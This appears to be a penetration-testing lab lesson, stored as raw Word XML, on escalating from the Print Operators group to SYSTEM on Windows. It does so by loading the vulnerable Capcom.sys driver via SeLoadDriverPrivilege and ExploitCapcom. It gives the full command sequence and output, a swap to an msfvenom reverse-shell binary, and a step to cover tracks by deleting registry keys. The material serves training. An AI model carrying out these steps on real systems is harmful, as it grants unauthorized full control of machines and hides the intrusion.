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6FE5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Print Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDB03B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3BC18EF6">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5EB402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hyperlink r:id="rId4" w:anchor="print-operators" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003918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Print Operators</w:t>
        </w:r>
      </w:hyperlink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another highly privileged group, which grants its members the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SeLoadDriverPrivilege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rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down. If we issue the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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priv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and don't see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SeLoadDriverPrivilege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from an unelevated context, we will need to bypass UAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C6BC6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Confirming Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F4381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Confirming Privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D64A8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C:\htb&gt;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whoami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/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priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="724B7518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53D8017E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PRIVILEGES INFORMATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE2EA5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----------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B102AB0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764264FF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Privilege Name           Description                          State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C297A47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======================== =================================    =======</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44E883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SeIncreaseQuotaPrivilege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Adjust memory quotas for a process   Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498A0AB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SeChangeNotifyPrivilege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Bypass</w:t>
      </w:r>
      <w:proofErr w:type="gram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traverse checking             Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5860A3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SeShutdownPrivilege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</w:t>
      </w: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Shut down the system                 Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8046F9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Checking Privileges Again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F9EBE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</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003918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UACMe</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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repo features a comprehensive list of UAC bypasses, which can be used from the command line. Alternatively, from a GUI, we can open an administrative command shell and input the credentials of the account that is a member of the Print Operators group. If we examine the privileges again, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SeLoadDriverPrivilege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visible but disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9A229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Checking Privileges Again </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FECF25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C:\htb&gt;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whoami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/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priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B5D8685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2DFE927B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PRIVILEGES INFORMATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A463D52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----------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AB34F4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2A1B3707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Privilege Name                Description                          State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711ADED5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============================= ==================================  ==========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE382AC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SeMachineAccountPrivilege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Add workstations to domain           Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6918CC89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SeLoadDriverPrivilege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Load and unload device drivers       Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776B8B9E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SeShutdownPrivilege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Shut down the system</w:t>
      </w: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ab/>
      </w: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ab/>
      </w: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ab/>
        <w:t xml:space="preserve">       Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D82328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SeChangeNotifyPrivilege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Bypass traverse checking             Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9B1FD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SeIncreaseWorkingSetPrivilege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Increase a process </w:t>
      </w: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working set       Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE0582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It's well known that the driver </w:t>
      </w:r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Capcom.sys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contains functionality to allow any user to execute shellcode with SYSTEM privileges. We can use our privileges to load this vulnerable driver and escalate privileges. We can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003918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this</w:t>
        </w:r>
      </w:hyperlink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tool to load the driver. The PoC enables the privilege as well as loads the driver for us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E63AD2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Download it locally and edit it, pasting over the includes below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6B6807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>Code: c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8290F0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#include &lt;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windows.h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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF0A19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#include &lt;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assert.h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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593342CA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#include &lt;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winternl.h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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9613D4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#include &lt;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sddl.h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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E837AB0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#include &lt;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stdio.h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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506A781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#include "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tchar.h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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54B331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Next, from a Visual Studio 2019 Developer Command Prompt, compile it using </w:t>
      </w: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cl.exe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3B6B2289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Compile with cl.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1818C367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Compile with cl.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D13E6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C:\Users\mrb3n\Desktop\Print Operators&gt;cl /DUNICODE /D_UNICODE </w:t>
      </w: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EnableSeLoadDriverPrivilege.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C10AFC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69CF5ABC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Microsoft (R) C/C++ Optimizing Compiler Version 19.28.29913 for </w:t>
      </w:r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x86</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52D8BB6F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Copyright (C) Microsoft Corporation.  All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B62B2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67262A8B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EnableSeLoadDriverPrivilege.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AF535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Microsoft (R) Incremental Linker Version 14.28.29913.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DDBC81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Copyright (C) Microsoft Corporation.  All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3395A14B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0E597A9D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/</w:t>
      </w:r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out:EnableSeLoadDriverPrivilege.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19C18DA3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EnableSeLoadDriverPrivilege.obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31636D53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Add Reference to Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E65CB17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Next, download the </w:t>
      </w:r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Capcom.sys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driver from </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003918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here</w:t>
        </w:r>
      </w:hyperlink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and save it to </w:t>
      </w:r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C:\temp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 Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D0534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Add Reference to Driver </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D5930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</w:t>
      </w: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:\htb&gt; reg add HKCU\System\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CurrentControlSet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\CAPCOM /v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ImagePath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/t REG_SZ /d "\??\C:\Tools\Capcom.sys"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC329E1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0C2A735C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The operation completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539842FF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134F21C8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5DCFB3C5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C:\htb&gt; reg add HKCU\System\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CurrentControlSet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\CAPCOM /v Type /t REG_DWORD /d </w:t>
      </w:r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1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04307CAA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532B2F0B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The operation completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8960F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odd syntax </w:t>
      </w:r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\??\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used to reference our malicious driver's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ImagePath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an </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003918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NT Object Path</w:t>
        </w:r>
      </w:hyperlink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 The Win32 API will parse and resolve this path to properly locate and load our malicious driver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566187DA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 xml:space="preserve">Verify Driver is not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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Loaded</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76A59E31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Using Nirsoft's </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003918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DriverView.exe</w:t>
        </w:r>
      </w:hyperlink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we can verify that the Capcom.sys driver is not loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2C280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Verify Driver is not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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Loaded</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC765A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PS C:\htb&gt; .\DriverView.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spell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stext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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drivers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B529F9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PS C:\htb&gt; cat drivers.txt | Select-String -pattern </w:t>
      </w:r>
      <w:proofErr w:type="gram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Capcom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B17EFAD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lastRenderedPageBreak/>
        <w:t>Verify Privilege is Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70529EDB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Run the </w:t>
      </w:r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EnableSeLoadDriverPrivilege.exe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binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA51DB0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Verify Privilege is Enabled </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570B297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C:\htb&gt; EnableSeLoadDriverPrivilege.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8039E6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553A0DBC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whoami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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2DD5B1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INLANEFREIGHT0\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printsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C6BAC77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19C3F772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whoami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/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priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DF89C52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SeMachineAccountPrivilege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Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1591A958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SeLoadDriverPrivilege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Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A4740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SeShutdownPrivilege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    Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C1127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SeChangeNotifyPrivilege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  Enabled by </w:t>
      </w:r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default</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="449AFA22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SeIncreaseWorkingSetPrivilege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Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087AB296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NTSTATUS: 00000000,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WinError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 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6621DBDD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Verify Capcom Driver is Listed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC900B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Next, verify that the Capcom driver is now listed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632EB8E8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Verify Capcom Driver is Listed </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12787DFE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PS C:\htb&gt; .\DriverView.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spell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stext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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drivers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3386275B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PS C:\htb&gt; cat drivers.txt | Select-String -pattern </w:t>
      </w:r>
      <w:proofErr w:type="gram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Capcom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3CA09CBC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78A9A77E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Driver Name         </w:t>
      </w:r>
      <w:proofErr w:type="gram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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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Capcom.sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B8CC1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Filename            </w:t>
      </w:r>
      <w:proofErr w:type="gram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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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C:\Tools\Capcom.sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A384E1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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ExploitCapcom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> Tool to Escalate Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D917D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To exploit the Capcom.sys, we can use the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003918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ExploitCapcom</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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tool after compiling with it Visual Studio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A335BE0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Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ExploitCapcom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Tool to Escalate Privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5876B0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PS C:\htb&gt; .\ExploitCapcom.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE47BA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27A2AC46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[*] Capcom.sys </w:t>
      </w:r>
      <w:proofErr w:type="gram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exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26B7BD18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[*] Capcom.sys handle was </w:t>
      </w:r>
      <w:proofErr w:type="spell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obained</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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as </w:t>
      </w:r>
      <w:proofErr w:type="gram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0000000000000070</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="71DDF604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[*] Shellcode was placed at </w:t>
      </w:r>
      <w:proofErr w:type="gram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0000024822A50008</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B33EF69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[+] Shellcode was </w:t>
      </w:r>
      <w:proofErr w:type="gram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executed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42748801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[+] Token stealing was </w:t>
      </w:r>
      <w:proofErr w:type="gram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successful</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B9267C2" w14:textId="77777777" w:rsidR="00391813" w:rsidRPr="00391813" w:rsidRDefault="00391813" w:rsidP="0039181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[+] The SYSTEM shell was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039181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launched</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0AA32558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This launches a shell with SYSTEM privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC465C" w14:textId="03DAE873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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B9636A8" wp14:editId="15AF5EF7">
            <wp:extent cx="5731510" cy="3620135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="692618801" name="Picture 1" descr="printopsexplo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topsexplo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0367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1CBB82DB">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="538340F0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Alternate Exploitation - No GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F0BB4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If we do not have GUI access to the target, we will have to modify the </w:t>
      </w:r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ExploitCapcom.cpp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code before compiling. Here we can edit line 292 and replace </w:t>
      </w:r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C:\\Windows\\system32\\cmd.exe"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with, say, a reverse shell binary created with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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msfvenom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for example: </w:t>
      </w:r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c:\ProgramData\revshell.exe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7250F465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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BCB836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// Launches a command shell process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3AA4A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static bool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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LaunchShell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</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED894FB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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D80839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TCHAR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CommandLine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[</w:t>
      </w:r>
      <w:proofErr w:type="gram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 = TEXT("C:\\Windows\\system32\\cmd.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC03E88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PROCESS_INFORMATION </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ProcessInfo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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="492BE0B7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STARTUPINFO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StartupInfo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= </w:t>
      </w:r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{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sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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StartupInfo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 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3358A951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if </w:t>
      </w:r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(!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CreateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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CommandLine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,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CommandLine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,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nullptr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,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nullptr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, FALSE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B646449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CREATE_NEW_CONSOLE,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nullptr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,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nullptr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, &amp;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StartupInfo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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056838E3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&amp;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ProcessInfo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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B1364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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63039C46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    return </w:t>
      </w:r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false;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C8F0512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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C23CA3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779CFC6C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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CloseHandle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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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ProcessInfo.hThread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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8CB8D0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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CloseHandle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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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ProcessInfo.hProcess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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9AEDE3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return </w:t>
      </w:r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true;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5BA4EDA3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D6DB0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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CommandLine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string in this example would be changed to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5F339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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557095F7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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> TCHAR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CommandLine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[</w:t>
      </w:r>
      <w:proofErr w:type="gram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 = TEXT("C:\\ProgramData\\revshell.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3610C7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would set up a listener based on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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msfvenom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payload we generated and hopefully receive a reverse shell connection back when executing </w:t>
      </w:r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ExploitCapcom.exe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 If a reverse shell connection is blocked for some reason, we can try a bind shell or exec/add user payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E7949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6097CB65">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EFBAF0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Automating the Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E365BA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 xml:space="preserve">Automating with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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EopLoadDriver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66C2508F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can use a tool such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0039181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EoPLoadDriver</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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automate the process of enabling the privilege, creating the registry key, and executing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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NTLoadDriver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load the driver. To do this, we would run the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47995C6F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Automating with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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EopLoadDriver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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BEA09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C:\htb&gt; EoPLoadDriver.exe System\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CurrentControlSet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\Capcom c:\Tools\Capcom.sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE41B2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28BB2F1E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[+] Enabling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SeLoadDriverPrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="300B697E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[+]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SeLoadDriverPrivilege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Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DAC736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[+] Loading Driver: </w:t>
      </w:r>
      <w:proofErr w:type="gram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\Registry\User\S-1-5-21-454284637-3659702366-2958135535-1103\System\CurrentControlSet\Capcom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2419448D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NTSTATUS: c000010e, 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WinError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 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78679835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would then run </w:t>
      </w:r>
      <w:r w:rsidRPr="0039181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ExploitCapcom.exe</w:t>
      </w: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pop a SYSTEM shell or run our custom binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394711EE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3A62D89A">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687A7DB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Clean-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F78F0" w14:textId="77777777" w:rsidR="00391813" w:rsidRPr="00391813" w:rsidRDefault="00391813" w:rsidP="00391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Removing Registry Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F7D1C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We can cover our tracks a bit by deleting the registry key added earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483F608E" w14:textId="77777777" w:rsidR="00391813" w:rsidRPr="00391813" w:rsidRDefault="00391813" w:rsidP="00391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Removing Registry Key </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42680911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C:\htb&gt; reg delete HKCU\System\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CurrentControlSet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\Capcom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30B714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63EC554D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Permanently delete the registry key HKEY_CURRENT_USER\System\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\Capcom (Yes/No)? Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C915F68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70062352" w14:textId="77777777" w:rsidR="00391813" w:rsidRPr="00391813" w:rsidRDefault="00391813" w:rsidP="00391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39181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The operation completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685FB73" w14:textId="77777777" w:rsidR="00391813" w:rsidRPr="00391813" w:rsidRDefault="00391813" w:rsidP="00391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Note: Since Windows 10 Version 1803, the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SeLoadDriverPrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039181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" is not exploitable, as it is no longer possible to include references to registry keys under "HKEY_CURRENT_USER".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09280C97" w14:textId="77777777" w:rsidR="00213442" w:rsidRPr="00391813" w:rsidRDefault="00213442">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="0039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A"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00391813"/>
    <w:rsid w:val="0076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08F8A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B13968D-9833-41B1-B227-618F0EAD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91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918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13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91813"/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91813"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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18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1813"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003918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13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ext-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00391813"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00391813"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00391813"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mb-0">
    <w:name w:val="mb-0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0039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6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penspecs/windows_protocols/ms-even/c1550f98-a1ce-426a-9991-7509e7c3787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uzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TarlogicSecurity/EoPLoadDriv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3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cp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hfiref0x/UACME" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tandasat/ExploitCapcom" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nirsoft.net/utils/dri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2023-08-07T11:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-07T11:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>